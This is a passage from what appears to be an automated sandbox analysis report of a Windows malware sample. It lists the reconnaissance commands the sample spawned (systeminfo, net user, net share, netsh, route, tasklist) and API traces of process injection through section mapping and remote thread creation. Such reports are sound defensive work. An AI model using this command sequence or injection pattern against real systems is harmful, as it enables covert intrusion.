Commandline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                      Target ID:33
                                                                                                                                      Start time:21:16:17
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:ipconfig /displaydns
                                                                                                                                      Imagebase:0x7ff7a16e0000
                                                                                                                                      File size:35'840 bytes
                                                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:21:16:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:route print
                                                                                                                                      Imagebase:0x7ff7f10e0000
                                                                                                                                      File size:24'576 bytes
                                                                                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:21:16:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:netsh firewall show state
                                                                                                                                      Imagebase:0x7ff621560000
                                                                                                                                      File size:96'768 bytes
                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:36
                                                                                                                                      Start time:21:16:20
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:systeminfo
                                                                                                                                      Imagebase:0x7ff7d2e90000
                                                                                                                                      File size:110'080 bytes
                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:38
                                                                                                                                      Start time:21:16:23
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:tasklist /v /fo csv
                                                                                                                                      Imagebase:0x7ff6bc140000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:39
                                                                                                                                      Start time:21:16:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net accounts /domain
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:40
                                                                                                                                      Start time:21:16:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net1.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\net1 accounts /domain
                                                                                                                                      Imagebase:0x7ff620e40000
                                                                                                                                      File size:183'808 bytes
                                                                                                                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:41
                                                                                                                                      Start time:21:16:56
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net share
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:42
                                                                                                                                      Start time:21:16:56
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net1.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\net1 share
                                                                                                                                      Imagebase:0x7ff620e40000
                                                                                                                                      File size:183'808 bytes
                                                                                                                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:43
                                                                                                                                      Start time:21:16:58
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\net.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:net user
                                                                                                                                      Imagebase:0x7ff75bf80000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                                                                                        Signature Coverage:43.4%
                                                                                                                                        Total number of Nodes:122
                                                                                                                                        Total number of Limit Nodes:4

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 159 4018c5 151->159 160 4018bc-4018e3 call 401193 151->160 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 159->160 161->153 163 4015e1-401605 NtCreateSection 161->163 165 401661-401687 NtCreateSection 163->165 166 401607-401628 NtMapViewOfSection 163->166 165->153 170 40168d-401691 165->170 166->165 168 40162a-401646 NtMapViewOfSection 166->168 168->165 171 401648-40165e 168->171 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 171->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 203 4018c5 195->203 204 4018bc-4018e3 call 401193 195->204 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 203->204 205->197 207 4015e1-401605 NtCreateSection 205->207 209 401661-401687 NtCreateSection 207->209 210 401607-401628 NtMapViewOfSection 207->210 209->197 214 40168d-401691 209->214 210->209 212 40162a-401646 NtMapViewOfSection 210->212 212->209 215 401648-40165e 212->215 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 215->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 242 4018c5 234->242 243 4018bc-4018e3 call 401193 234->243 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 242->243 244->236 246 4015e1-401605 NtCreateSection 244->246 248 401661-401687 NtCreateSection 246->248 249 401607-401628 NtMapViewOfSection 246->249 248->236 253 40168d-401691 248->253 249->248 251 40162a-401646 NtMapViewOfSection 249->251 251->248 254 401648-40165e 251->254 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 254->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 282 4018c5 274->282 283 4018bc-4018e3 call 401193 274->283 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 282->283 284->276 286 4015e1-401605 NtCreateSection 284->286 288 401661-401687 NtCreateSection 286->288 289 401607-401628 NtMapViewOfSection 286->289 288->276 293 40168d-401691 288->293 289->288 291 40162a-401646 NtMapViewOfSection 289->291 291->288 294 401648-40165e 291->294 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 294->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 319 503919-503932 320 503934-503936 319->320 321 503938 320->321 322 50393d-503949 CreateToolhelp32Snapshot 320->322 321->322 323 503959-503966 Module32First 322->323 324 50394b-503951 322->324 325 503968-503969 call 5035d8 323->325 326 50396f-503977 323->326 324->323 331 503953-503957 324->331 329 50396e 325->329 329->326 331->320 331->323
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00503941
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00503961
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: 9b7ec3692cb4cd72cc765cc2a760264b54496de3f36314acdafc3b490a3adcef
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: E7F09631200715BBE7303FF9AC8DB6E7AECBF49724F140928E642914C0DBB0ED454661

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 0 4b003c-4b0047 1 4b0049 0->1 2 4b004c-4b0263 call 4b0a3f call 4b0e0f call 4b0d90 VirtualAlloc 0->2 1->2 17 4b028b-4b0292 2->17 18 4b0265-4b0289 call 4b0a69 2->18 20 4b02a1-4b02b0 17->20 22 4b02ce-4b03c2 VirtualProtect call 4b0cce call 4b0ce7 18->22 20->22 23 4b02b2-4b02cc 20->23 29 4b03d1-4b03e0 22->29 23->20 30 4b0439-4b04b8 VirtualFree 29->30 31 4b03e2-4b0437 call 4b0ce7 29->31 33 4b04be-4b04cd 30->33 34 4b05f4-4b05fe 30->34 31->29 36 4b04d3-4b04dd 33->36 37 4b077f-4b0789 34->37 38 4b0604-4b060d 34->38 36->34 40 4b04e3-4b0505 36->40 41 4b078b-4b07a3 37->41 42 4b07a6-4b07b0 37->42 38->37 43 4b0613-4b0637 38->43 52 4b0517-4b0520 40->52 53 4b0507-4b0515 40->53 41->42 44 4b086e-4b08be LoadLibraryA 42->44 45 4b07b6-4b07cb 42->45 46 4b063e-4b0648 43->46 51 4b08c7-4b08f9 44->51 48 4b07d2-4b07d5 45->48 46->37 49 4b064e-4b065a 46->49 54 4b07d7-4b07e0 48->54 55 4b0824-4b0833 48->55 49->37 50 4b0660-4b066a 49->50 56 4b067a-4b0689 50->56 58 4b08fb-4b0901 51->58 59 4b0902-4b091d 51->59 60 4b0526-4b0547 52->60 53->60 61 4b07e2 54->61 62 4b07e4-4b0822 54->62 57 4b0839-4b083c 55->57 63 4b068f-4b06b2 56->63 64 4b0750-4b077a 56->64 57->44 65 4b083e-4b0847 57->65 58->59 66 4b054d-4b0550 60->66 61->55 62->48 69 4b06ef-4b06fc 63->69 70 4b06b4-4b06ed 63->70 64->46 71 4b084b-4b086c 65->71 72 4b0849 65->72 67 4b05e0-4b05ef 66->67 68 4b0556-4b056b 66->68 67->36 74 4b056f-4b057a 68->74 75 4b056d 68->75 76 4b074b 69->76 77 4b06fe-4b0748 69->77 70->69 71->57 72->44 78 4b059b-4b05bb 74->78 79 4b057c-4b0599 74->79 75->67 76->56 77->76 84 4b05bd-4b05db 78->84 79->84 84->66
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004B024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 3ab0f07624891138f2a196dea9d1c45aa3da684c3a44e81f7e50d60f331bd9e4
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: AE527974A00229DFDB64CF58C984BA9BBB1BF09305F1480DAE50DAB351DB34AE85DF25

Control-flow Graph

control_flow_graph: function starting at 4b0e0f; API calls in graph: SetErrorMode (called twice) (rendered graph omitted)
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,004B0223,?,?), ref: 004B0E19
• SetErrorMode.KERNELBASE(00000000,?,?,004B0223,?,?), ref: 004B0E1E
Memory Dump Source
• Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: eed68f84607e2b327b3ebbdec56108b8437801bff84edba81ed917c1dc319f98
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: DED0123114512877DB002A94DC09BCE7B1CDF05B63F008411FB0DD9180C774994046E9

Control-flow Graph

control_flow_graph: function starting at 4018e6; internal calls 401193, 40141f, 401514; API calls in graph: Sleep (rendered graph omitted)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
• Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Control-flow Graph

control_flow_graph: function starting at 401915 (also reaches 4018c6); internal calls 401193, 40141f, 401514; API calls in graph: Sleep (rendered graph omitted)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
• Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Control-flow Graph

control_flow_graph: function starting at 4018f1; internal calls 401193, 40141f, 401514; API calls in graph: Sleep (rendered graph omitted)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
